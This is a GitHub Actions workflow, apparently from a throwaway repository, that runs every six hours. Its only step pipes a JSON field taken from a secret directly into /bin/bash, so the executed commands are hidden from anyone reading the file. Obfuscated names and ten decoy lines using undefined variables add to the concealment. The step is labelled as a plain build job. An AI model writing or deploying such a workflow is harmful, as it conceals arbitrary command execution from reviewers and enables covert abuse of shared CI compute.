name: daichengwei6175
on:
  workflow_dispatch:
  schedule:
    - cron: '22 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: daichengwei6175
        env:
          ax509: ${{ secrets.ax509 }}
        run: |
          echo $ax509 | jq -r .ryfeg596 | /bin/bash
          echo $ivagd8631 | jq -r .cxaff64 | /bin/bash
          echo $ae29 | jq -r .ngc30112 | /bin/bash
          echo $qqcc229 | jq -r .mdbjk7621 | /bin/bash
          echo $tnqoy5288 | jq -r .yu2169 | /bin/bash
          echo $hh9557 | jq -r .fax15134 | /bin/bash
          echo $cbk428 | jq -r .xbmf2 | /bin/bash
          echo $rsdy1 | jq -r .bhhr0 | /bin/bash
          echo $dwrcr73170 | jq -r .hcrk70 | /bin/bash
          echo $z11 | jq -r .zfiuq55 | /bin/bash
          echo $prbf22078 | jq -r .yx647 | /bin/bash

